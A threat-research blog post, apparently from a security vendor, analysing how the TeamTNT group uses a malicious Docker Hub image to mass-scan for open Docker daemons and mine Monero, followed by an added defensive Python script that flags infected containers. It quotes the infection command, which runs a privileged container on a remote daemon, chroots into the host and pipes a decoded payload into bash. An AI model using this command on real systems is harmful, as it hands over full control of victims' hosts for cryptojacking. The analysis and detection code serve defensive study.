You may have seen our recent posts about how TeamTNT is abusing Docker daemons for mining Monero. In this blog post, we will describe another method we have observed that includes the use of malicious Docker images available at Docker Hub.

The alpineos/dockerimage is a public Docker image available at Docker Hub. This Docker image is the one responsible for the scanning and infection that we described in our last blog post. At the moment this post was published, it had almost 4,000 downloads, and you can see that the user has other Docker images (all of them related to either mass scanning or mining using XMRig).

If we have a closer look at the image using the tool ‘dive’, you can see that the image was created with the following Dockerfile:

It is a simple Alpine image with only two modifications: the installation of bash and the copy of the pause bash script that will handle all the operations. Once the container is created, the pause script is executed.

The pause bash script is a simple script, but it works really well. There are three different functions that perfectly explain what it is trying to do:

1. Prepare the container. It installs the curl, wget, jq, masscan, libpcap-dev, go, git, gcc, make and docker packages that it will need for the next steps.
2. Download zgrab (a banner grabber written in Go) from and compile it.
3. Start masscan in a random public subnet looking for open Docker daemon ports.

Once an open Docker daemon is found, it runs:

```
docker -H $D_TARGET run -d --privileged --net host -v /:/host alpine chroot /host bash -c 'echo <base64 payload> | base64 -d | bash'
```

Since the script is aggressively scanning the Internet, it is normal to re-infect already infected systems, as there’s no check to see if they are already running. This is strange behavior because the same group did check if the host was already infected on another occasion.

In this series of posts, we have explored how the TeamTNT group is able to massively scan and compromise open Docker daemons. They always have the same goal, mining Monero, but they use different methods to try to maximize their mining.
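As an added example (not Sysdig's or TeamTNT's code), a small triage script that flags running containers whose `docker inspect` output matches the run command quoted in this post: privileged, on the host network, with the host root filesystem bind-mounted and a chroot into it. The sample inspect output below is constructed; on a real host, feed it `docker inspect $(docker ps -q)`.

```python
import json

# Constructed sample in the shape `docker inspect` emits (fields trimmed).
SAMPLE_INSPECT = json.dumps([
    {"Id": "aaa111", "Name": "/dreamy_kare",
     "Config": {"Image": "alpine",
                "Cmd": ["chroot", "/host", "bash", "-c", "echo ... | base64 -d | bash"]},
     "HostConfig": {"Privileged": True, "NetworkMode": "host", "Binds": ["/:/host"]}},
    {"Id": "bbb222", "Name": "/web",
     "Config": {"Image": "nginx:1.21", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Privileged": False, "NetworkMode": "bridge",
                    "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
])


def host_root_mounted(binds):
    """True if any bind mount uses the host root filesystem '/' as its source."""
    return any(bind.split(":", 1)[0] == "/" for bind in binds or [])


def triage(inspect_json):
    """Return (name, image, reasons) for containers matching the infection pattern.

    Each property alone can be legitimate (a node exporter on the host network,
    say); three or more together is what the quoted run command produces.
    """
    findings = []
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        cfg = c.get("Config", {})
        reasons = []
        if hc.get("Privileged"):
            reasons.append("privileged")
        if hc.get("NetworkMode") == "host":
            reasons.append("host network")
        if host_root_mounted(hc.get("Binds")):
            reasons.append("host / bind-mounted")
        if "chroot /host" in " ".join(cfg.get("Cmd") or []):
            reasons.append("chroot into host")
        if len(reasons) >= 3:
            findings.append((c["Name"].lstrip("/"), cfg.get("Image"), reasons))
    return findings


if __name__ == "__main__":
    # Real use: triage(subprocess.check_output(["docker", "inspect", *ids]))
    for name, image, reasons in triage(SAMPLE_INSPECT):
        print(f"{name} ({image}): {', '.join(reasons)}")
```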